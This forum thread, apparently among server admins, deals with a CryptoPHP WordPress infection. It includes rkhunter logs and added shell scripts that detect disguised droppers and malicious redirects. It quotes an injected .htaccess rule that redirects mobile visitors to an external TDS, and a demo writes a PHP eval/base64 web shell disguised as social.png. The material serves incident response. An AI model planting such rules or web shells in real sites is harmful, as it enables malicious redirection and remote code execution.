Posted

Good afternoon,

 

Today the server's IP landed on Spamhaus; when I went to check, it was on the trojan list.

 

It looks like a WordPress site is infected with "CryptoPHP".

 

I froze 3 accounts that had the "social.png" file and use WordPress.

 

My fear is that the server was compromised. Well, I'll post the rkhunter logs; I believe it was not compromised and the results should be false positives (WARNING):

 

[10:35:28]   /sbin/ifdown                                    [ Warning ]
[10:35:28] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[10:35:29]   /sbin/ifup                                      [ Warning ]
[10:35:29] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
 
 
 
[10:35:49]   /usr/bin/GET                                    [ Warning ]
[10:35:49] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: a /usr/bin/perl -w script text executable
 
 
[10:35:51]   /usr/bin/ldd                                    [ Warning ]
[10:35:51] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable
 
[10:35:58]   /usr/bin/whatis                                 [ Warning ]
[10:35:58] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: POSIX shell script text executable
 
[10:49:38]   Checking for hidden files and directories       [ Warning ]
[10:49:38] Warning: Hidden directory found: /dev/.mdadm
[10:49:38] Warning: Hidden directory found: /dev/.udev
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[10:49:38] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
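Two checks that follow from this post, as an added example that is not part of the original thread: a scan of the hosting accounts for any social.png that is really PHP (the CryptoPHP dropper hides behind that name), and a package-manager verification of the binaries rkhunter reported as "replaced by a script". The /home-style layout, the constructed sample files and the assumption that the box is RPM-based (CentOS/RHEL 6, suggested by the /dev/.udev and .fipscheck.hmac paths in the log) are mine, not the poster's.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes an RPM-based host;
# the Debian equivalents are noted inline.

# Return 0 when FILE is PHP hiding behind an image name. A genuine PNG starts
# with the 8-byte signature 89 50 4E 47 0D 0A 1A 0A; the dropper does not,
# and carries a "<?php" tag somewhere in its body.
is_php_disguised_as_image() {
    f="$1"
    [ -f "$f" ] || return 1
    sig=$(head -c 8 "$f" | od -An -tx1 | tr -d ' \n')
    [ "$sig" = "89504e470d0a1a0a" ] && return 1
    grep -q '<?php' "$f"
}

# Walk the document roots under ROOT and print each social.png (any case)
# that fails the PNG check. Prints nothing when the tree is clean.
find_cryptophp_droppers() {
    find "$1" -type f -iname 'social.png' 2>/dev/null | while IFS= read -r f; do
        if is_php_disguised_as_image "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# For each path rkhunter flagged, report whether the package manager still
# agrees with the file on disk. "rpm -V" prints nothing for an unmodified
# file; a line such as "S.5....T.  /sbin/ifup" (size and digest changed)
# means the file really was replaced. On CentOS 6 /sbin/ifup and
# /sbin/ifdown ship as shell scripts in the initscripts package, so the
# rkhunter warning by itself proves nothing either way.
verify_flagged_paths() {
    if ! command -v rpm >/dev/null 2>&1; then
        echo "rpm not found: on Debian-based hosts use 'dpkg -S <path>' and 'debsums -c' instead"
        return 0
    fi
    for p in "$@"; do
        pkg=$(rpm -qf "$p" 2>/dev/null) || { echo "$p: not owned by any package (investigate)"; continue; }
        changed=$(rpm -V "$pkg" 2>/dev/null | awk -v p="$p" '$NF == p')
        if [ -n "$changed" ]; then
            echo "$p: MODIFIED ($pkg): $changed"
        else
            echo "$p: matches $pkg"
        fi
    done
}

# --- demo on constructed files (not real infected content) -----------------
demo=$(mktemp -d)
mkdir -p "$demo/acct1/public_html/wp-content/plugins/pack" "$demo/acct2/public_html/images"
# constructed dropper: PHP text stored under a .png name
printf '<?php if(isset($_POST["x"])){eval(base64_decode($_POST["x"]));} ?>\n' \
    > "$demo/acct1/public_html/wp-content/plugins/pack/social.png"
# constructed benign file: just a real PNG signature
printf '\211PNG\r\n\032\n' > "$demo/acct2/public_html/images/social.png"
echo "droppers found:"
find_cryptophp_droppers "$demo"          # prints only the acct1 file
echo "rkhunter-flagged paths:"
verify_flagged_paths /sbin/ifdown /sbin/ifup /usr/bin/GET /usr/bin/ldd /usr/bin/whatis
rm -rf "$demo"
```

Run it as root with the real account root in place of the temporary directory (`find_cryptophp_droppers /home`); a hit under wp-content/plugins or wp-content/themes is the pattern this thread describes, and `rpm -V` on the flagged paths settles whether the "replaced by a script" warnings are package-shipped scripts or genuine tampering.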

Posted

Yeah, I had a tremendous headache with that blacklist => http://www.spamhaus.org/xbl/

 

It is listing IPs that host sites using CryptoPHP, with or without the backdoor installed, and consequently block after block on mail servers, especially Hotmail.

 

Two client VPSs were using the same shared IP in Exim; we had to change everything to use a different IP.

 

The problem is that only one of the VPSs had a WordPress site with an encrypted plugin.

Posted

Did you manage to find which site is infected?

 

I have 4 accounts; I found a suspicious one, take a look at the .htaccess:

 

 

# Injected block (it sits above the W3TC and WordPress sections that the
# plugin and WordPress normally write): matches mobile User-Agents and the
# WAP / Opera Mini / UA-pixels headers phones send, then 302-redirects those
# visitors to an external TDS. The first RewriteCond below (and the
# AddOutputFilterByType line further down) were cut off when pasted, as the
# trailing "$" shows; they are left as they appeared.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^al$
RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR]
RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]
RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]
RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]
RewriteCond %{HTTP:UA-pixels} .+
RewriteRule ^(.*)$ http://isupport.x24hr.com/tds/go.php?sid=1 [L,R=302]
# BEGIN W3TC Browser Cache
<IfModule mod_deflate.c>
    <IfModule mod_headers.c>
        Header append Vary User-Agent env=!dont-vary
    </IfModule>
        AddOutputFilterByType DEFLATE text/css text/x-component application/x-javascript application/javascript text/javascript text/x-js text/html text/richtext image/svg+xml text/plain text/xsd text/xsl text/xml image/x-icon applicati$
    <IfModule mod_mime.c>
        # DEFLATE by extension
        AddOutputFilter DEFLATE js css htm html xml
    </IfModule>
</IfModule>
# END W3TC Browser Cache
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
 
# END WordPress
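Static triage of a .htaccess like the one above, as an added example that is not part of the original thread: it lists RewriteRule lines whose target is an absolute URL on a foreign host, reports whether they are gated on the visitor's User-Agent or WAP/Opera Mini headers (which is why a desktop admin or a search crawler never sees the redirect), and includes a live probe that fetches the site once as a desktop browser and once as a phone. The site hostname is a parameter ("example.com" in the demo is a placeholder), and the sample .htaccess is constructed from the rules quoted in the post.

```shell
#!/bin/sh
# Added example, not from the original post. Nothing here needs Apache;
# only probe_mobile_redirect needs network access and it is not called below.

# Print every RewriteRule in FILE that redirects to an absolute http(s) URL
# whose host is not SITE_HOST. Returns 0 if any was printed, 1 otherwise.
# Commented-out rules are ignored.
find_external_redirects() {
    file="$1"; site_host="$2"; found=1
    while IFS= read -r line; do
        trimmed=${line#"${line%%[![:space:]]*}"}       # strip leading whitespace
        case "$trimmed" in '#'*) continue ;; esac
        case "$line" in
            *RewriteRule*http://*|*RewriteRule*https://*) ;;
            *) continue ;;
        esac
        # pull the host out of "RewriteRule <pattern> http://host/path [flags]"
        target=$(printf '%s\n' "$line" | sed -n 's/.*\(https\{0,1\}:\/\/[^/ ]*\).*/\1/p')
        host=${target#*://}
        if [ -n "$host" ] && [ "$host" != "$site_host" ]; then
            printf '%s\n' "$line"
            found=0
        fi
    done < "$file"
    return $found
}

# Return 0 when FILE contains a RewriteCond keyed on the User-Agent or on
# the WAP / Opera Mini / UA-pixels headers that mobile browsers send.
is_ua_gated() {
    grep -Eq 'RewriteCond[[:space:]]+%[{](HTTP_USER_AGENT|HTTP:HTTP_X_WAP_PROFILE|HTTP:HTTP_PROFILE|HTTP:X-OperaMini-Features|HTTP:UA-pixels)[}]' "$1"
}

# Live probe: fetch URL with the given User-Agent and print the status code
# and the Location curl would follow. A site carrying the rule above answers
# 200 to a desktop UA and 302 to a foreign host for a phone UA.
probe_as() {
    label="$1"; ua="$2"; url="$3"
    printf '%-8s ' "$label"
    curl -s -o /dev/null -A "$ua" -w '%{http_code} %{redirect_url}\n' "$url"
}
probe_mobile_redirect() {
    probe_as desktop 'Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0' "$1"
    probe_as mobile  'Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B411' "$1"
}

# --- demo on a constructed .htaccess ---------------------------------------
demo=$(mktemp -d)
cat > "$demo/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^1207.*|.*Fennec.*|^acer.* [NC,OR]
RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]
RewriteCond %{HTTP:UA-pixels} .+
RewriteRule ^(.*)$ http://isupport.x24hr.com/tds/go.php?sid=1 [L,R=302]
# RewriteRule ^legacy$ http://oldhost.invalid/ [R=301,L]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
EOF
echo "external redirects in $demo/.htaccess:"
find_external_redirects "$demo/.htaccess" example.com || echo "(none)"
if is_ua_gated "$demo/.htaccess"; then
    echo "gated on mobile User-Agent/WAP headers: desktop admins and crawlers never see it"
fi
rm -rf "$demo"
```

To sweep a whole server, loop `find_external_redirects` over `find /home -name .htaccess` with each account's own domain as the second argument; `probe_mobile_redirect http://the-site/` then confirms from the outside whether a phone visitor is still being sent to the TDS after cleanup.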
